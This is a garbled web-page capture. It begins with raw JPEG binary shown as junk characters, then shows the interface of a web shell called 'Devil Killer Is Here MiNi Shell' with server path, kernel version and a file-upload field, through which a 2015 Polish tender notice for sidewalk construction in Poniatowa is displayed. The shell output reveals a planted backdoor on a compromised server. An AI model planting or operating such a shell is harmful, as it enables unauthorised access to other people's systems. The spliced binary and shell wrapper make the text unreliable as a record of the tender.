JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150722/108855-N-2015.html

<p class="kh_header"><b>Poniatowa: Budowa i przebudowa chodników przy drogach powiatowych w 2015 roku wg zadań:Zad. 1- Budowa chodnika przy drodze powiatowej nr 2618 L w m. Dąbrowa Wronowska 
Zad. 2- Przebudowa chodnika przy drodze powiatowej nr 2237 L na  
            odcinku  ul. Kraczewickiej w Poniatowej
Zad. 3-Budowa chodnika przy drodze powiatowej nr 2626 L w m.Puszno Godowskie</b><br>
<b>Numer ogłoszenia: 108855 - 2015; data zamieszczenia: 22.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Opolu Lubelskim z siedzibą w Poniatowej , ul. Młodzieżowa 6, 24-320 Poniatowa, woj. lubelskie, tel. 081 8204072, faks 081 8204072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpopole.bip-gov.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa i przebudowa chodników przy drogach powiatowych w 2015 roku wg zadań:Zad. 1- Budowa chodnika przy drodze powiatowej nr 2618 L w m. Dąbrowa Wronowska 
Zad. 2- Przebudowa chodnika przy drodze powiatowej nr 2237 L na  
            odcinku  ul. Kraczewickiej w Poniatowej
Zad. 3-Budowa chodnika przy drodze powiatowej nr 2626 L w m.Puszno Godowskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest ,,Budowa i przebudowa chodników przy drogach powiatowych w 2015 roku      
      wg  zadań:

 Zad. 1- Budowa chodnika przy drodze powiatowej nr 2618 L w m. Dąbrowa Wronowska  (w kierunku szkoły) na odcinkach (w kilometrze roboczym) od km 0+183,5 do km 0+238 dł.54,5 m i  od km 2+065 do km 2+115 długości  50 mb

   Zad. 2- Przebudowa chodnika przy drodze powiatowej nr 2237 L Poniatowa - Kraczewice - Szczuczki na odcinku  ul. Kraczewickiej w Poniatowej - odcinek długości  507 mb

   Zad. 3-Budowa chodnika przy drodze powiatowej nr 2626 L Wrzelowiec - Kręciszówka - Puszno Godowskie od km 0+508,50 do km 0+758,50  dł. 250,00 mb w  m. Puszno Godowskie

 2. Szczegółowy zakres rzeczowy przedmiotu zamówienia obejmuje:
 
 1)Dla Zadania 1 - Budowa chodnika przy drodze powiatowej nr 2618 L w m. Dąbrowa Wronowska (w kierunku szkoły) na odcinkach (w kilometrze roboczym) od km 0+183,5 do km 0+238  dł.54,5 m i od km  2+065 do km 2+115 dł. 50 mb
W ramach budowy zostaną wykonane następujące roboty: 
 a)  Roboty ziemne:
           -  roboty pomiarowe,
           -  roboty ziemne poprzeczne z wbudowaniem ziemi w nasyp,
           -  rowki pod krawężniki,
           -  formowanie i zagęszczenie nasypów,
b) Krawężniki i obrzeża:
            -  ława pod krawężniki,
            -  krawężniki betonowe 15x30
            -  obrzeża betonowe 6x20 i 8x30
       c) Nawierzchnia chodnika i wjazdów:
           -  podbudowa z gruntu stabilizowanego cementem Rm-1,5 MPa ,gr. 8 cm,
           - chodnik z kostki brukowej  kolorowej gr. 6 cm,
           - podbudowa z gruntu stabilizowanego cementem Rm-5 MPa  gr. 12 cm,
           - wjazdy z kostki brukowej, szarej, gr. 8 cm
           -  humusowanie skarp  z obsianiem trawą,
           - oznakowanie poziome jezdni cienkowarstwowe i pionowe  (przejście dla pieszych).

   2)  Dla Zadania 2 - Przebudowa chodnika przy drodze powiatowej nr 2237 L Poniatowa - Kraczewice - 
                                     Szczuczki na  odcinku  ul. Kraczewickiej w Poniatowej - odcinek długości  507 mb
     W ramach budowy zostaną wykonane następujące roboty: 
      a)  Roboty przygotowawcze i rozbiórkowe:
           -  roboty pomiarowe,
           -  rozebranie obrzeży betonowych 20x6, chodnika z płyt betonowych 35x35x5, krawężnika15x30,
      b)  Roboty ziemne:
           -   wykopy wykonane mechanicznie,
           -  regulacja włazu kanałowego i studzienek telekomunikacyjnych,
      c)  Podbudowa
           -  podbudowa z kruszywa łamanego gr. 20 cm ( wjazdy),
           -  ulepszone podłoże z gruntu stabilizowanego cementem Rm-2,5 MPa gr. 15 cm,
           -  ulepszone podłoże z gruntu stabilizowanego cementem Rm-1,5 MPa gr. 10 cm,
      d)  Elementy ulic
           - ustawienie  obrzeży betonowych 20x6,  30x8,
           -  ustawienie krawężnika 20x30 na ławie betonowej z oporem, wysokość ok. 17 cm od jezdni
           - chodnik z kostki brukowej  kolorowej gr. 6 cm,
           - wjazdy z kostki brukowej, szarej, gr. 8 cm,
      e)  Roboty wykończeniowe
            -  plantowanie skarp, humusowanie z obsianiem trawą

   3)  Dla Zadania 3 - Budowa chodnika przy drodze powiatowej nr 2626 L Wrzelowiec - Kręciszówka - 
                                    Puszno Godowskie od km 0+508,50 do km 0+758,50  dł. 250,00 mb w  m. Puszno
                                    Godowskie
     W ramach budowy zostaną wykonane następujące roboty: 
      a)  Roboty przygotowawcze i rozbiórkowe:
           -  roboty pomiarowe,
           -  rozebranie podbudowy z kruszywa  gr. 20 cm, rozebranie nawierzchni z mieszanki asfaltowej (przekop),
      b)  Roboty ziemne:
           -   wykopy wykonane mechanicznie,
           -  formowanie i zagęszczenie nasypów,
      c)  Odwodnienie korpusu drogowego:
           -  kanał z rur kanalizacyjnych PEHD o śr. 150 mm ,
           -  studzienka ściekowa o śr. 500 mm z osadnikiem bez syfonu,
       d)  Podbudowa,
           -  podbudowa z kruszywa łamanego gr. 20 cm (przekop),
           -  podbudowa z kruszywa łamanego gr. 15 cm (zjazdy)
           -  ulepszone podłoże z gruntu stabilizowanego cementem Rm 1,5 MPa gr. 10 cm,
           -  ulepszone podłoże z gruntu stabilizowanego cementem Rm 1,5 MPa gr. 15 cm,
           -  podbudowa z betonu asfaltowego gr, 7 cm (przekop),
       e)  Nawierzchnie:
           -  w-wa ścieralna z betony asfaltowego (przekop),
           - wjazdy z kostki brukowej, szarej, gr. 8 cm,
       f)  Roboty wykończeniowe:
           -  plantowanie skarp z humusowaniem i obsianiem trawą,
           -  umocnienie wylotów przykanalików brukiem,
       g)  Elementy ulic:
           -  ustawienie krawężnika 20x30 na ławie betonowej z oporem,
           -  ustawienie krawężnika 12x25 (zjazdy),
           -  ustawienie obrzeży betonowych 20x6,
           - chodnik z kostki brukowej  kolorowej gr. 6 cm,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt. 6) ustawy Pzp. Stanowić one mogą nie więcej niż 50% wartości zamówienia podstawowego. Zamówienia uzupełniające polegają na powtórzeniu tego samego rodzaju zamówień i są zgodne z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości ogółem  4 300,00 PLN (słownie złotych: cztery tysiące trzysta i 00/100) przed upływem terminu  składania ofert, w tym na n/w zadania:
Zadanie I -       650,00 zł
Zadanie II -   2 150,00 zł
Zadanie III  - 1 500,00 zł
 w formie zgodniej z art. 45 ust. 6 ustawy Pzp, tj.:
a) w pieniądzu;
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) w gwarancjach bankowych;
d) w gwarancjach ubezpieczeniowych;
e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., poz.275,  z 2008 r. nr 116, poz. 730 i 732 i Nr 227, poz.1505 oraz z 2010 r. Nr 96, poz.620).
1.W przypadku złożenia wadium w formie pieniężnej, wadium należy wnieść przelewem na  rachunek Zamawiającego:   Bank Pekao S.A.  nr 81 1240 5497 1111 0010 4156 4009
Wadium uważa się za wniesione w terminie, jeżeli kwota wadium znajdzie się na rachunku bankowym  Zamawiającego przed upływem terminu składania ofert. Wadium musi być wniesione i obejmować cały okres związania ofertą. Wykonawca, który nie wniesie wadium w określonym terminie, zostanie wykluczony z postępowania na podst. art. 24 ust. 2 pkt. 2. ustawy Pzp.
2.W przypadku wnoszenia wadium w innej formie niż pieniężnej kopię poświadczoną za zgodność z oryginałem należy dołączyć do oferty ,a oryginał tego dokumentu należy złożyć do depozytu w kasie  Zarządu Dróg - pok. Nr 7
3.W przypadku przelewu wadium na konto Zamawiającego, do oferty należy dołączyć kserokopię przelewu   
            potwierdzoną ,,za zgodność z oryginałem,,.
4.Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Pzp.
Wadium wraz z odsetkami wniesione w pieniądzu przez Wykonawcę, którego oferta została uznana za najkorzystniejszą, na wniosek tego Wykonawcy, zaliczane jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy.
Wykonawca zostanie wykluczony z postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości i wybranej formie zgodnie z    rozdziałem XI pkt 1 SIWZ .
Zamawiający zatrzymuje wadium wraz z odsetkami , jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn lezących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
    określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn
    leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
      Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp- zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca  wykaże że, wykonał należycie  w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) minimum  1 robotę budowlaną polegającą na budowie, przebudowie lub remoncie chodnika,  przy czym jej wartość nie może być mniejsza niż 50 000,00 zł brutto oraz przedstawi dowody (poświadczenia) potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie dokonana na podstawie dokumentu pn,,wykaz robót budowlanych,, - zał. nr 4 do SIWZ oraz załączonych dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca  
  zobowiązany jest wykazać w sposób szczególny.
         Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp - zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, w zał. nr 5 do SIWZ, że  na czas realizacji zamówienia będzie dysponował   osobami zdolnymi do wykonania zamówienia, w szczególności minimum jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia  posiadającą  minimum 1 rok doświadczenia w pracy na stanowisku kierownika budowy, zdolną do pełnienia samodzielnej funkcji  kierownika budowy , posiadającą uprawnienia   budowlane w specjalności drogowej wydane zgodnie  ustawą  z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz..U. z 2013 r poz 1409 ze zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju  z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r., poz. 1278) w specjalności drogowej bez ograniczeń do kierowania robotami budowlanymi lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w niniejszym postępowaniu lub odpowiadające im uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2013r., poz. 1409 z późn. zm.) oraz ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008r. Nr 63, poz. 394 z późn. zm.). i należącą do właściwej izby samorządu zawodowego wraz z informacjami na temat ich kwalifikacji  zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
         Ocena spełniania warunku na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp - zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony i podpisany formularz oferty - zał. nr 1, 1a, 1b  do SIWZ  ;
b)	Kosztorys ofertowy - zał. nr 11, 11a, 11b  do SIWZ  ;
c)	Dowód wniesienia wadium;
d)	Wskazanie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom- zał. nr 8 do SIWZ  
e)	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (oryginał) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia
f)	Dokument, z którego wynika upoważnienie osoby/osób do podpisania oferty w imieniu Wykonawcy lub pełnomocnictwo do reprezentowania Wykonawcy w formie oryginału lub kserokopii poświadczonej ,,za zgodność z oryginałe,, przez notariusza lub mocodawcę, o ile nie wynika to z innych   dokumentów załączonych do oferty przez Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia do umowy zawiera wzór umowy stanowiący Załącznik nr 9.
2.	Zmiana postanowień niniejszej Umowy może nastąpić za zgodą obu stron w drodze pisemnego aneksu pod rygorem nieważności takiej zmiany.
3.	Na podstawie art. 144 ustawy Pzp Zamawiający dopuszcza się możliwość zmiany postanowień 
       zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy,   
       na poniższych warunkach :
a)	zmiana terminu realizacji przedmiotu zamówienia w przypadku:
­	działania siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie terminie, o czas działania siły wyższej oraz niezbędny do usunięcia skutków tego działania,
­	zaistnienia niesprzyjających warunków atmosferycznych, (np. długotrwałe intensywne opady deszczu, temperatura powietrza, przy której niedopuszczalne jest prowadzenie robót budowlanych; powodzie itp.)uniemożliwiających wykonanie robót lub spełnienie wymogów technologicznych udokumentowanych w dzienniku budowy, o czas trwania niesprzyjających warunków atmosferycznych,
­	konieczności uzyskania decyzji i uzgodnień, mogących spowodować wstrzymanie robót,
